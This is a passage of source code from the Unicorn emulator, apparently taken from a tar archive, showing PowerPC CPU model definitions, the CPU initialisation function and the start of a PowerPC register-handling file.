POWERPC_SVR_8533_v11, e500v2) 
POWERPC_DEF_SVR("mpc8533e_v10", "MPC8533E v1.0", CPU_POWERPC_MPC8533E_v10, POWERPC_SVR_8533E_v10, e500v2) POWERPC_DEF_SVR("mpc8533e_v11", "MPC8533E v1.1", CPU_POWERPC_MPC8533E_v11, POWERPC_SVR_8533E_v11, e500v2) POWERPC_DEF_SVR("mpc8540_v10", "MPC8540 v1.0", CPU_POWERPC_MPC8540_v10, POWERPC_SVR_8540_v10, e500v1) POWERPC_DEF_SVR("mpc8540_v20", "MPC8540 v2.0", CPU_POWERPC_MPC8540_v20, POWERPC_SVR_8540_v20, e500v1) POWERPC_DEF_SVR("mpc8540_v21", "MPC8540 v2.1", CPU_POWERPC_MPC8540_v21, POWERPC_SVR_8540_v21, e500v1) POWERPC_DEF_SVR("mpc8541_v10", "MPC8541 v1.0", CPU_POWERPC_MPC8541_v10, POWERPC_SVR_8541_v10, e500v1) POWERPC_DEF_SVR("mpc8541_v11", "MPC8541 v1.1", CPU_POWERPC_MPC8541_v11, POWERPC_SVR_8541_v11, e500v1) POWERPC_DEF_SVR("mpc8541e_v10", "MPC8541E v1.0", CPU_POWERPC_MPC8541E_v10, POWERPC_SVR_8541E_v10, e500v1) POWERPC_DEF_SVR("mpc8541e_v11", "MPC8541E v1.1", CPU_POWERPC_MPC8541E_v11, POWERPC_SVR_8541E_v11, e500v1) POWERPC_DEF_SVR("mpc8543_v10", "MPC8543 v1.0", CPU_POWERPC_MPC8543_v10, POWERPC_SVR_8543_v10, e500v2) POWERPC_DEF_SVR("mpc8543_v11", "MPC8543 v1.1", CPU_POWERPC_MPC8543_v11, POWERPC_SVR_8543_v11, e500v2) POWERPC_DEF_SVR("mpc8543_v20", "MPC8543 v2.0", CPU_POWERPC_MPC8543_v20, POWERPC_SVR_8543_v20, e500v2) POWERPC_DEF_SVR("mpc8543_v21", "MPC8543 v2.1", CPU_POWERPC_MPC8543_v21, POWERPC_SVR_8543_v21, e500v2) POWERPC_DEF_SVR("mpc8543e_v10", "MPC8543E v1.0", CPU_POWERPC_MPC8543E_v10, POWERPC_SVR_8543E_v10, e500v2) POWERPC_DEF_SVR("mpc8543e_v11", "MPC8543E v1.1", CPU_POWERPC_MPC8543E_v11, POWERPC_SVR_8543E_v11, e500v2) POWERPC_DEF_SVR("mpc8543e_v20", "MPC8543E v2.0", CPU_POWERPC_MPC8543E_v20, POWERPC_SVR_8543E_v20, e500v2) POWERPC_DEF_SVR("mpc8543e_v21", "MPC8543E v2.1", CPU_POWERPC_MPC8543E_v21, POWERPC_SVR_8543E_v21, e500v2) POWERPC_DEF_SVR("mpc8544_v10", "MPC8544 v1.0", CPU_POWERPC_MPC8544_v10, POWERPC_SVR_8544_v10, e500v2) POWERPC_DEF_SVR("mpc8544_v11", "MPC8544 v1.1", CPU_POWERPC_MPC8544_v11, POWERPC_SVR_8544_v11, e500v2) POWERPC_DEF_SVR("mpc8544e_v10", "MPC8544E v1.0", CPU_POWERPC_MPC8544E_v10, POWERPC_SVR_8544E_v10, e500v2) POWERPC_DEF_SVR("mpc8544e_v11", "MPC8544E v1.1", CPU_POWERPC_MPC8544E_v11, POWERPC_SVR_8544E_v11, e500v2) POWERPC_DEF_SVR("mpc8545_v20", "MPC8545 v2.0", CPU_POWERPC_MPC8545_v20, POWERPC_SVR_8545_v20, e500v2) POWERPC_DEF_SVR("mpc8545_v21", "MPC8545 v2.1", CPU_POWERPC_MPC8545_v21, POWERPC_SVR_8545_v21, e500v2) POWERPC_DEF_SVR("mpc8545e_v20", "MPC8545E v2.0", CPU_POWERPC_MPC8545E_v20, POWERPC_SVR_8545E_v20, e500v2) POWERPC_DEF_SVR("mpc8545e_v21", "MPC8545E v2.1", CPU_POWERPC_MPC8545E_v21, POWERPC_SVR_8545E_v21, e500v2) POWERPC_DEF_SVR("mpc8547e_v20", "MPC8547E v2.0", CPU_POWERPC_MPC8547E_v20, POWERPC_SVR_8547E_v20, e500v2) POWERPC_DEF_SVR("mpc8547e_v21", "MPC8547E v2.1", CPU_POWERPC_MPC8547E_v21, POWERPC_SVR_8547E_v21, e500v2) POWERPC_DEF_SVR("mpc8548_v10", "MPC8548 v1.0", CPU_POWERPC_MPC8548_v10, POWERPC_SVR_8548_v10, e500v2) POWERPC_DEF_SVR("mpc8548_v11", "MPC8548 v1.1", CPU_POWERPC_MPC8548_v11, POWERPC_SVR_8548_v11, e500v2) POWERPC_DEF_SVR("mpc8548_v20", "MPC8548 v2.0", CPU_POWERPC_MPC8548_v20, POWERPC_SVR_8548_v20, e500v2) POWERPC_DEF_SVR("mpc8548_v21", "MPC8548 v2.1", CPU_POWERPC_MPC8548_v21, POWERPC_SVR_8548_v21, e500v2) POWERPC_DEF_SVR("mpc8548e_v10", "MPC8548E v1.0", CPU_POWERPC_MPC8548E_v10, POWERPC_SVR_8548E_v10, e500v2) POWERPC_DEF_SVR("mpc8548e_v11", "MPC8548E v1.1", CPU_POWERPC_MPC8548E_v11, POWERPC_SVR_8548E_v11, e500v2) POWERPC_DEF_SVR("mpc8548e_v20", "MPC8548E v2.0", CPU_POWERPC_MPC8548E_v20, POWERPC_SVR_8548E_v20, e500v2) 
POWERPC_DEF_SVR("mpc8548e_v21", "MPC8548E v2.1", CPU_POWERPC_MPC8548E_v21, POWERPC_SVR_8548E_v21, e500v2) POWERPC_DEF_SVR("mpc8555_v10", "MPC8555 v1.0", CPU_POWERPC_MPC8555_v10, POWERPC_SVR_8555_v10, e500v2) POWERPC_DEF_SVR("mpc8555_v11", "MPC8555 v1.1", CPU_POWERPC_MPC8555_v11, POWERPC_SVR_8555_v11, e500v2) POWERPC_DEF_SVR("mpc8555e_v10", "MPC8555E v1.0", CPU_POWERPC_MPC8555E_v10, POWERPC_SVR_8555E_v10, e500v2) POWERPC_DEF_SVR("mpc8555e_v11", "MPC8555E v1.1", CPU_POWERPC_MPC8555E_v11, POWERPC_SVR_8555E_v11, e500v2) POWERPC_DEF_SVR("mpc8560_v10", "MPC8560 v1.0", CPU_POWERPC_MPC8560_v10, POWERPC_SVR_8560_v10, e500v2) POWERPC_DEF_SVR("mpc8560_v20", "MPC8560 v2.0", CPU_POWERPC_MPC8560_v20, POWERPC_SVR_8560_v20, e500v2) POWERPC_DEF_SVR("mpc8560_v21", "MPC8560 v2.1", CPU_POWERPC_MPC8560_v21, POWERPC_SVR_8560_v21, e500v2) POWERPC_DEF_SVR("mpc8567", "MPC8567", CPU_POWERPC_MPC8567, POWERPC_SVR_8567, e500v2) POWERPC_DEF_SVR("mpc8567e", "MPC8567E", CPU_POWERPC_MPC8567E, POWERPC_SVR_8567E, e500v2) POWERPC_DEF_SVR("mpc8568", "MPC8568", CPU_POWERPC_MPC8568, POWERPC_SVR_8568, e500v2) POWERPC_DEF_SVR("mpc8568e", "MPC8568E", CPU_POWERPC_MPC8568E, POWERPC_SVR_8568E, e500v2) POWERPC_DEF_SVR("mpc8572", "MPC8572", CPU_POWERPC_MPC8572, POWERPC_SVR_8572, e500v2) POWERPC_DEF_SVR("mpc8572e", "MPC8572E", CPU_POWERPC_MPC8572E, POWERPC_SVR_8572E, e500v2) /* e600 family */ POWERPC_DEF("e600", CPU_POWERPC_e600, e600, "PowerPC e600 core") /* PowerPC e600 microcontrollers */ POWERPC_DEF_SVR("mpc8610", "MPC8610", CPU_POWERPC_MPC8610, POWERPC_SVR_8610, e600) POWERPC_DEF_SVR("mpc8641", "MPC8641", CPU_POWERPC_MPC8641, POWERPC_SVR_8641, e600) POWERPC_DEF_SVR("mpc8641d", "MPC8641D", CPU_POWERPC_MPC8641D, POWERPC_SVR_8641D, e600) /* 32 bits "classic" PowerPC */ /* PowerPC 6xx family */ POWERPC_DEF("601_v0", CPU_POWERPC_601_v0, 601, "PowerPC 601v0") POWERPC_DEF("601_v1", CPU_POWERPC_601_v1, 601, "PowerPC 601v1") POWERPC_DEF("601_v2", CPU_POWERPC_601_v2, 601v, "PowerPC 601v2") POWERPC_DEF("602", CPU_POWERPC_602, 602, "PowerPC 602") POWERPC_DEF("603", CPU_POWERPC_603, 603, "PowerPC 603") POWERPC_DEF("603e_v1.1", CPU_POWERPC_603E_v11, 603E, "PowerPC 603e v1.1") POWERPC_DEF("603e_v1.2", CPU_POWERPC_603E_v12, 603E, "PowerPC 603e v1.2") POWERPC_DEF("603e_v1.3", CPU_POWERPC_603E_v13, 603E, "PowerPC 603e v1.3") POWERPC_DEF("603e_v1.4", CPU_POWERPC_603E_v14, 603E, "PowerPC 603e v1.4") POWERPC_DEF("603e_v2.2", CPU_POWERPC_603E_v22, 603E, "PowerPC 603e v2.2") POWERPC_DEF("603e_v3", CPU_POWERPC_603E_v3, 603E, "PowerPC 603e v3") POWERPC_DEF("603e_v4", CPU_POWERPC_603E_v4, 603E, "PowerPC 603e v4") POWERPC_DEF("603e_v4.1", CPU_POWERPC_603E_v41, 603E, "PowerPC 603e v4.1") POWERPC_DEF("603e7", CPU_POWERPC_603E7, 603E, "PowerPC 603e (aka PID7)") POWERPC_DEF("603e7t", CPU_POWERPC_603E7t, 603E, "PowerPC 603e7t") POWERPC_DEF("603e7v", CPU_POWERPC_603E7v, 603E, "PowerPC 603e7v") POWERPC_DEF("603e7v1", CPU_POWERPC_603E7v1, 603E, "PowerPC 603e7v1") POWERPC_DEF("603e7v2", CPU_POWERPC_603E7v2, 603E, "PowerPC 603e7v2") POWERPC_DEF("603p", CPU_POWERPC_603P, 603E, "PowerPC 603p (aka PID7v)") POWERPC_DEF("604", CPU_POWERPC_604, 604, "PowerPC 604") POWERPC_DEF("604e_v1.0", CPU_POWERPC_604E_v10, 604E, "PowerPC 604e v1.0") POWERPC_DEF("604e_v2.2", CPU_POWERPC_604E_v22, 604E, "PowerPC 604e v2.2") POWERPC_DEF("604e_v2.4", CPU_POWERPC_604E_v24, 604E, "PowerPC 604e v2.4") POWERPC_DEF("604r", CPU_POWERPC_604R, 604E, "PowerPC 604r (aka PIDA)") /* PowerPC 7xx family */ POWERPC_DEF("740_v1.0", CPU_POWERPC_7x0_v10, 740, "PowerPC 740 v1.0 (G3)") POWERPC_DEF("750_v1.0", 
CPU_POWERPC_7x0_v10, 750, "PowerPC 750 v1.0 (G3)") POWERPC_DEF("740_v2.0", CPU_POWERPC_7x0_v20, 740, "PowerPC 740 v2.0 (G3)") POWERPC_DEF("750_v2.0", CPU_POWERPC_7x0_v20, 750, "PowerPC 750 v2.0 (G3)") POWERPC_DEF("740_v2.1", CPU_POWERPC_7x0_v21, 740, "PowerPC 740 v2.1 (G3)") POWERPC_DEF("750_v2.1", CPU_POWERPC_7x0_v21, 750, "PowerPC 750 v2.1 (G3)") POWERPC_DEF("740_v2.2", CPU_POWERPC_7x0_v22, 740, "PowerPC 740 v2.2 (G3)") POWERPC_DEF("750_v2.2", CPU_POWERPC_7x0_v22, 750, "PowerPC 750 v2.2 (G3)") POWERPC_DEF("740_v3.0", CPU_POWERPC_7x0_v30, 740, "PowerPC 740 v3.0 (G3)") POWERPC_DEF("750_v3.0", CPU_POWERPC_7x0_v30, 750, "PowerPC 750 v3.0 (G3)") POWERPC_DEF("740_v3.1", CPU_POWERPC_7x0_v31, 740, "PowerPC 740 v3.1 (G3)") POWERPC_DEF("750_v3.1", CPU_POWERPC_7x0_v31, 750, "PowerPC 750 v3.1 (G3)") POWERPC_DEF("740e", CPU_POWERPC_740E, 740, "PowerPC 740E (G3)") POWERPC_DEF("750e", CPU_POWERPC_750E, 750, "PowerPC 750E (G3)") POWERPC_DEF("740p", CPU_POWERPC_7x0P, 740, "PowerPC 740P (G3)") POWERPC_DEF("750p", CPU_POWERPC_7x0P, 750, "PowerPC 750P (G3)") POWERPC_DEF("750cl_v1.0", CPU_POWERPC_750CL_v10, 750cl, "PowerPC 750CL v1.0") POWERPC_DEF("750cl_v2.0", CPU_POWERPC_750CL_v20, 750cl, "PowerPC 750CL v2.0") POWERPC_DEF("750cx_v1.0", CPU_POWERPC_750CX_v10, 750cx, "PowerPC 750CX v1.0 (G3 embedded)") POWERPC_DEF("750cx_v2.0", CPU_POWERPC_750CX_v20, 750cx, "PowerPC 750CX v2.0 (G3 embedded)") POWERPC_DEF("750cx_v2.1", CPU_POWERPC_750CX_v21, 750cx, "PowerPC 750CX v2.1 (G3 embedded)") POWERPC_DEF("750cx_v2.2", CPU_POWERPC_750CX_v22, 750cx, "PowerPC 750CX v2.2 (G3 embedded)") POWERPC_DEF("750cxe_v2.1", CPU_POWERPC_750CXE_v21, 750cx, "PowerPC 750CXe v2.1 (G3 embedded)") POWERPC_DEF("750cxe_v2.2", CPU_POWERPC_750CXE_v22, 750cx, "PowerPC 750CXe v2.2 (G3 embedded)") POWERPC_DEF("750cxe_v2.3", CPU_POWERPC_750CXE_v23, 750cx, "PowerPC 750CXe v2.3 (G3 embedded)") POWERPC_DEF("750cxe_v2.4", CPU_POWERPC_750CXE_v24, 750cx, "PowerPC 750CXe v2.4 (G3 embedded)") POWERPC_DEF("750cxe_v2.4b", CPU_POWERPC_750CXE_v24b, 750cx, "PowerPC 750CXe v2.4b (G3 embedded)") POWERPC_DEF("750cxe_v3.0", CPU_POWERPC_750CXE_v30, 750cx, "PowerPC 750CXe v3.0 (G3 embedded)") POWERPC_DEF("750cxe_v3.1", CPU_POWERPC_750CXE_v31, 750cx, "PowerPC 750CXe v3.1 (G3 embedded)") POWERPC_DEF("750cxe_v3.1b", CPU_POWERPC_750CXE_v31b, 750cx, "PowerPC 750CXe v3.1b (G3 embedded)") POWERPC_DEF("750cxr", CPU_POWERPC_750CXR, 750cx, "PowerPC 750CXr (G3 embedded)") POWERPC_DEF("750fl", CPU_POWERPC_750FL, 750fx, "PowerPC 750FL (G3 embedded)") POWERPC_DEF("750fx_v1.0", CPU_POWERPC_750FX_v10, 750fx, "PowerPC 750FX v1.0 (G3 embedded)") POWERPC_DEF("750fx_v2.0", CPU_POWERPC_750FX_v20, 750fx, "PowerPC 750FX v2.0 (G3 embedded)") POWERPC_DEF("750fx_v2.1", CPU_POWERPC_750FX_v21, 750fx, "PowerPC 750FX v2.1 (G3 embedded)") POWERPC_DEF("750fx_v2.2", CPU_POWERPC_750FX_v22, 750fx, "PowerPC 750FX v2.2 (G3 embedded)") POWERPC_DEF("750fx_v2.3", CPU_POWERPC_750FX_v23, 750fx, "PowerPC 750FX v2.3 (G3 embedded)") POWERPC_DEF("750gl", CPU_POWERPC_750GL, 750gx, "PowerPC 750GL (G3 embedded)") POWERPC_DEF("750gx_v1.0", CPU_POWERPC_750GX_v10, 750gx, "PowerPC 750GX v1.0 (G3 embedded)") POWERPC_DEF("750gx_v1.1", CPU_POWERPC_750GX_v11, 750gx, "PowerPC 750GX v1.1 (G3 embedded)") POWERPC_DEF("750gx_v1.2", CPU_POWERPC_750GX_v12, 750gx, "PowerPC 750GX v1.2 (G3 embedded)") POWERPC_DEF("750l_v2.0", CPU_POWERPC_750L_v20, 750, "PowerPC 750L v2.0 (G3 embedded)") POWERPC_DEF("750l_v2.1", CPU_POWERPC_750L_v21, 750, "PowerPC 750L v2.1 (G3 embedded)") POWERPC_DEF("750l_v2.2", CPU_POWERPC_750L_v22, 750, "PowerPC 
750L v2.2 (G3 embedded)") POWERPC_DEF("750l_v3.0", CPU_POWERPC_750L_v30, 750, "PowerPC 750L v3.0 (G3 embedded)") POWERPC_DEF("750l_v3.2", CPU_POWERPC_750L_v32, 750, "PowerPC 750L v3.2 (G3 embedded)") POWERPC_DEF("745_v1.0", CPU_POWERPC_7x5_v10, 745, "PowerPC 745 v1.0") POWERPC_DEF("755_v1.0", CPU_POWERPC_7x5_v10, 755, "PowerPC 755 v1.0") POWERPC_DEF("745_v1.1", CPU_POWERPC_7x5_v11, 745, "PowerPC 745 v1.1") POWERPC_DEF("755_v1.1", CPU_POWERPC_7x5_v11, 755, "PowerPC 755 v1.1") POWERPC_DEF("745_v2.0", CPU_POWERPC_7x5_v20, 745, "PowerPC 745 v2.0") POWERPC_DEF("755_v2.0", CPU_POWERPC_7x5_v20, 755, "PowerPC 755 v2.0") POWERPC_DEF("745_v2.1", CPU_POWERPC_7x5_v21, 745, "PowerPC 745 v2.1") POWERPC_DEF("755_v2.1", CPU_POWERPC_7x5_v21, 755, "PowerPC 755 v2.1") POWERPC_DEF("745_v2.2", CPU_POWERPC_7x5_v22, 745, "PowerPC 745 v2.2") POWERPC_DEF("755_v2.2", CPU_POWERPC_7x5_v22, 755, "PowerPC 755 v2.2") POWERPC_DEF("745_v2.3", CPU_POWERPC_7x5_v23, 745, "PowerPC 745 v2.3") POWERPC_DEF("755_v2.3", CPU_POWERPC_7x5_v23, 755, "PowerPC 755 v2.3") POWERPC_DEF("745_v2.4", CPU_POWERPC_7x5_v24, 745, "PowerPC 745 v2.4") POWERPC_DEF("755_v2.4", CPU_POWERPC_7x5_v24, 755, "PowerPC 755 v2.4") POWERPC_DEF("745_v2.5", CPU_POWERPC_7x5_v25, 745, "PowerPC 745 v2.5") POWERPC_DEF("755_v2.5", CPU_POWERPC_7x5_v25, 755, "PowerPC 755 v2.5") POWERPC_DEF("745_v2.6", CPU_POWERPC_7x5_v26, 745, "PowerPC 745 v2.6") POWERPC_DEF("755_v2.6", CPU_POWERPC_7x5_v26, 755, "PowerPC 755 v2.6") POWERPC_DEF("745_v2.7", CPU_POWERPC_7x5_v27, 745, "PowerPC 745 v2.7") POWERPC_DEF("755_v2.7", CPU_POWERPC_7x5_v27, 755, "PowerPC 755 v2.7") POWERPC_DEF("745_v2.8", CPU_POWERPC_7x5_v28, 745, "PowerPC 745 v2.8") POWERPC_DEF("755_v2.8", CPU_POWERPC_7x5_v28, 755, "PowerPC 755 v2.8") /* PowerPC 74xx family */ POWERPC_DEF("7400_v1.0", CPU_POWERPC_7400_v10, 7400, "PowerPC 7400 v1.0 (G4)") POWERPC_DEF("7400_v1.1", CPU_POWERPC_7400_v11, 7400, "PowerPC 7400 v1.1 (G4)") POWERPC_DEF("7400_v2.0", CPU_POWERPC_7400_v20, 7400, "PowerPC 7400 v2.0 (G4)") POWERPC_DEF("7400_v2.1", CPU_POWERPC_7400_v21, 7400, "PowerPC 7400 v2.1 (G4)") POWERPC_DEF("7400_v2.2", CPU_POWERPC_7400_v22, 7400, "PowerPC 7400 v2.2 (G4)") POWERPC_DEF("7400_v2.6", CPU_POWERPC_7400_v26, 7400, "PowerPC 7400 v2.6 (G4)") POWERPC_DEF("7400_v2.7", CPU_POWERPC_7400_v27, 7400, "PowerPC 7400 v2.7 (G4)") POWERPC_DEF("7400_v2.8", CPU_POWERPC_7400_v28, 7400, "PowerPC 7400 v2.8 (G4)") POWERPC_DEF("7400_v2.9", CPU_POWERPC_7400_v29, 7400, "PowerPC 7400 v2.9 (G4)") POWERPC_DEF("7410_v1.0", CPU_POWERPC_7410_v10, 7410, "PowerPC 7410 v1.0 (G4)") POWERPC_DEF("7410_v1.1", CPU_POWERPC_7410_v11, 7410, "PowerPC 7410 v1.1 (G4)") POWERPC_DEF("7410_v1.2", CPU_POWERPC_7410_v12, 7410, "PowerPC 7410 v1.2 (G4)") POWERPC_DEF("7410_v1.3", CPU_POWERPC_7410_v13, 7410, "PowerPC 7410 v1.3 (G4)") POWERPC_DEF("7410_v1.4", CPU_POWERPC_7410_v14, 7410, "PowerPC 7410 v1.4 (G4)") POWERPC_DEF("7448_v1.0", CPU_POWERPC_7448_v10, 7400, "PowerPC 7448 v1.0 (G4)") POWERPC_DEF("7448_v1.1", CPU_POWERPC_7448_v11, 7400, "PowerPC 7448 v1.1 (G4)") POWERPC_DEF("7448_v2.0", CPU_POWERPC_7448_v20, 7400, "PowerPC 7448 v2.0 (G4)") POWERPC_DEF("7448_v2.1", CPU_POWERPC_7448_v21, 7400, "PowerPC 7448 v2.1 (G4)") POWERPC_DEF("7450_v1.0", CPU_POWERPC_7450_v10, 7450, "PowerPC 7450 v1.0 (G4)") POWERPC_DEF("7450_v1.1", CPU_POWERPC_7450_v11, 7450, "PowerPC 7450 v1.1 (G4)") POWERPC_DEF("7450_v1.2", CPU_POWERPC_7450_v12, 7450, "PowerPC 7450 v1.2 (G4)") POWERPC_DEF("7450_v2.0", CPU_POWERPC_7450_v20, 7450, "PowerPC 7450 v2.0 (G4)") POWERPC_DEF("7450_v2.1", CPU_POWERPC_7450_v21, 
7450, "PowerPC 7450 v2.1 (G4)") POWERPC_DEF("7441_v2.1", CPU_POWERPC_7450_v21, 7440, "PowerPC 7441 v2.1 (G4)") POWERPC_DEF("7441_v2.3", CPU_POWERPC_74x1_v23, 7440, "PowerPC 7441 v2.3 (G4)") POWERPC_DEF("7451_v2.3", CPU_POWERPC_74x1_v23, 7450, "PowerPC 7451 v2.3 (G4)") POWERPC_DEF("7441_v2.10", CPU_POWERPC_74x1_v210, 7440, "PowerPC 7441 v2.10 (G4)") POWERPC_DEF("7451_v2.10", CPU_POWERPC_74x1_v210, 7450, "PowerPC 7451 v2.10 (G4)") POWERPC_DEF("7445_v1.0", CPU_POWERPC_74x5_v10, 7445, "PowerPC 7445 v1.0 (G4)") POWERPC_DEF("7455_v1.0", CPU_POWERPC_74x5_v10, 7455, "PowerPC 7455 v1.0 (G4)") POWERPC_DEF("7445_v2.1", CPU_POWERPC_74x5_v21, 7445, "PowerPC 7445 v2.1 (G4)") POWERPC_DEF("7455_v2.1", CPU_POWERPC_74x5_v21, 7455, "PowerPC 7455 v2.1 (G4)") POWERPC_DEF("7445_v3.2", CPU_POWERPC_74x5_v32, 7445, "PowerPC 7445 v3.2 (G4)") POWERPC_DEF("7455_v3.2", CPU_POWERPC_74x5_v32, 7455, "PowerPC 7455 v3.2 (G4)") POWERPC_DEF("7445_v3.3", CPU_POWERPC_74x5_v33, 7445, "PowerPC 7445 v3.3 (G4)") POWERPC_DEF("7455_v3.3", CPU_POWERPC_74x5_v33, 7455, "PowerPC 7455 v3.3 (G4)") POWERPC_DEF("7445_v3.4", CPU_POWERPC_74x5_v34, 7445, "PowerPC 7445 v3.4 (G4)") POWERPC_DEF("7455_v3.4", CPU_POWERPC_74x5_v34, 7455, "PowerPC 7455 v3.4 (G4)") POWERPC_DEF("7447_v1.0", CPU_POWERPC_74x7_v10, 7445, "PowerPC 7447 v1.0 (G4)") POWERPC_DEF("7457_v1.0", CPU_POWERPC_74x7_v10, 7455, "PowerPC 7457 v1.0 (G4)") POWERPC_DEF("7447_v1.1", CPU_POWERPC_74x7_v11, 7445, "PowerPC 7447 v1.1 (G4)") POWERPC_DEF("7457_v1.1", CPU_POWERPC_74x7_v11, 7455, "PowerPC 7457 v1.1 (G4)") POWERPC_DEF("7457_v1.2", CPU_POWERPC_74x7_v12, 7455, "PowerPC 7457 v1.2 (G4)") POWERPC_DEF("7447a_v1.0", CPU_POWERPC_74x7A_v10, 7445, "PowerPC 7447A v1.0 (G4)") POWERPC_DEF("7457a_v1.0", CPU_POWERPC_74x7A_v10, 7455, "PowerPC 7457A v1.0 (G4)") POWERPC_DEF("7447a_v1.1", CPU_POWERPC_74x7A_v11, 7445, "PowerPC 7447A v1.1 (G4)") POWERPC_DEF("7457a_v1.1", CPU_POWERPC_74x7A_v11, 7455, "PowerPC 7457A v1.1 (G4)") POWERPC_DEF("7447a_v1.2", CPU_POWERPC_74x7A_v12, 7445, "PowerPC 7447A v1.2 (G4)") POWERPC_DEF("7457a_v1.2", CPU_POWERPC_74x7A_v12, 7455, "PowerPC 7457A v1.2 (G4)") #ifdef TARGET_PPC64 POWERPC_DEF_SVR("e5500", "e5500", CPU_POWERPC_e5500, POWERPC_SVR_E500, e5500) POWERPC_DEF_SVR("e6500", "e6500", CPU_POWERPC_e6500, POWERPC_SVR_E500, e6500) POWERPC_DEF("970_v2.2", CPU_POWERPC_970_v22, 970, "PowerPC 970 v2.2") POWERPC_DEF("970fx_v1.0", CPU_POWERPC_970FX_v10, 970, "PowerPC 970FX v1.0 (G5)") POWERPC_DEF("970fx_v2.0", CPU_POWERPC_970FX_v20, 970, "PowerPC 970FX v2.0 (G5)") POWERPC_DEF("970fx_v2.1", CPU_POWERPC_970FX_v21, 970, "PowerPC 970FX v2.1 (G5)") POWERPC_DEF("970fx_v3.0", CPU_POWERPC_970FX_v30, 970, "PowerPC 970FX v3.0 (G5)") POWERPC_DEF("970fx_v3.1", CPU_POWERPC_970FX_v31, 970, "PowerPC 970FX v3.1 (G5)") POWERPC_DEF("970mp_v1.0", CPU_POWERPC_970MP_v10, 970, "PowerPC 970MP v1.0") POWERPC_DEF("970mp_v1.1", CPU_POWERPC_970MP_v11, 970, "PowerPC 970MP v1.1") POWERPC_DEF("power5+_v2.1", CPU_POWERPC_POWER5P_v21, POWER5P, "POWER5+ v2.1") POWERPC_DEF("power7_v2.3", CPU_POWERPC_POWER7_v23, POWER7, "POWER7 v2.3") POWERPC_DEF("power7+_v2.1", CPU_POWERPC_POWER7P_v21, POWER7, "POWER7+ v2.1") POWERPC_DEF("power8e_v2.1", CPU_POWERPC_POWER8E_v21, POWER8, "POWER8E v2.1") POWERPC_DEF("power8_v2.0", CPU_POWERPC_POWER8_v20, POWER8, "POWER8 v2.0") POWERPC_DEF("power8nvl_v1.0", CPU_POWERPC_POWER8NVL_v10, POWER8, "POWER8NVL v1.0") POWERPC_DEF("power9_v1.0", CPU_POWERPC_POWER9_DD1, POWER9, "POWER9 v1.0") POWERPC_DEF("power9_v2.0", CPU_POWERPC_POWER9_DD20, POWER9, "POWER9 v2.0") POWERPC_DEF("power10_v1.0", 
CPU_POWERPC_POWER10_DD1, POWER10, "POWER10 v1.0") #endif /* defined (TARGET_PPC64) */ }; PowerPCCPU *cpu_ppc_init(struct uc_struct *uc) { PowerPCCPU *cpu; CPUState *cs; CPUClass *cc; PowerPCCPUClass *pcc; cpu = malloc(sizeof(*cpu)); if (cpu == NULL) { return NULL; } memset(cpu, 0, sizeof(*cpu)); #ifdef TARGET_PPC64 if (uc->cpu_model == INT_MAX) { uc->cpu_model = UC_CPU_PPC64_POWER10_V1_0 + UC_CPU_PPC32_7457A_V1_2 + 1; // power10_v1.0 } else if (uc->cpu_model + UC_CPU_PPC32_7457A_V1_2 + 1 >= ARRAY_SIZE(ppc_cpus)) { free(cpu); return NULL; } #else if (uc->cpu_model == INT_MAX) { uc->cpu_model = UC_CPU_PPC32_7457A_V1_2; // 7457a_v1.2 } else if (uc->cpu_model >= ARRAY_SIZE(ppc_cpus)) { free(cpu); return NULL; } #endif cs = (CPUState *)cpu; cc = (CPUClass *)&cpu->cc; cs->cc = cc; cs->uc = uc; uc->cpu = (CPUState *)cpu; /* init CPUClass */ cpu_class_init(uc, cc); /* init PowerPCCPUClass */ ppc_cpu_class_init(uc, cc); /* init PowerPC family class */ pcc = &cpu->cc; pcc->pvr = ppc_cpus[uc->cpu_model].pvr; pcc->svr = ppc_cpus[uc->cpu_model].svr; if (ppc_cpus[uc->cpu_model].cpu_family_class_init) { ppc_cpus[uc->cpu_model].cpu_family_class_init(cc, uc); } /* init CPUState */ cpu_common_initfn(uc, cs); /* init PowerPCCPU */ ppc_cpu_instance_init(uc, cs); /* init PowerPC types */ /* postinit PowerPCCPU */ /* realize PowerPCCPU */ ppc_cpu_realize(uc, cs); /* realize CPUState */ // init address space cpu_address_space_init(cs, 0, cs->memory); qemu_init_vcpu(cs); ppc_cpu_reset((CPUState *)cpu); return cpu; } ��������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/unicorn.c�������������������������������������������������������������0000664�0000000�0000000�00000020313�14675241067�0020043�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "qemu/osdep.h" #include "hw/ppc/ppc.h" #include "sysemu/cpus.h" #include "cpu.h" #include "unicorn_common.h" #include "uc_priv.h" #include "unicorn.h" #include "helper_regs.h" #include "cpu.h" #ifdef TARGET_PPC64 typedef uint64_t ppcreg_t; #else typedef uint32_t ppcreg_t; #endif // Unicorn version to ensure writing MSR without exception static inline int uc_ppc_store_msr(CPUPPCState *env, target_ulong value, int alter_hv) { // int excp; // CPUState *cs = env_cpu(env); // excp = 0; value &= env->msr_mask; /* Neither mtmsr nor guest state can alter HV */ if (!alter_hv || !(env->msr & MSR_HVB)) { value &= ~MSR_HVB; value |= env->msr & MSR_HVB; } if (((value >> MSR_IR) & 1) != msr_ir || ((value >> MSR_DR) & 1) != msr_dr) { // cpu_interrupt_exittb(cs); } if ((env->mmu_model & POWERPC_MMU_BOOKE) && ((value >> MSR_GS) & 1) != msr_gs) { // cpu_interrupt_exittb(cs); } if (unlikely((env->flags & POWERPC_FLAG_TGPR) && ((value ^ env->msr) & (1 << MSR_TGPR)))) { /* Swap temporary saved registers with GPRs */ hreg_swap_gpr_tgpr(env); } if (unlikely((value >> MSR_EP) & 1) != msr_ep) { /* Change the exception prefix on PowerPC 601 */ env->excp_prefix = ((value >> MSR_EP) & 1) * 0xFFF00000; } /* * If PR=1 then EE, IR and DR must be 1 * * Note: We only enforce this on 64-bit server processors. 
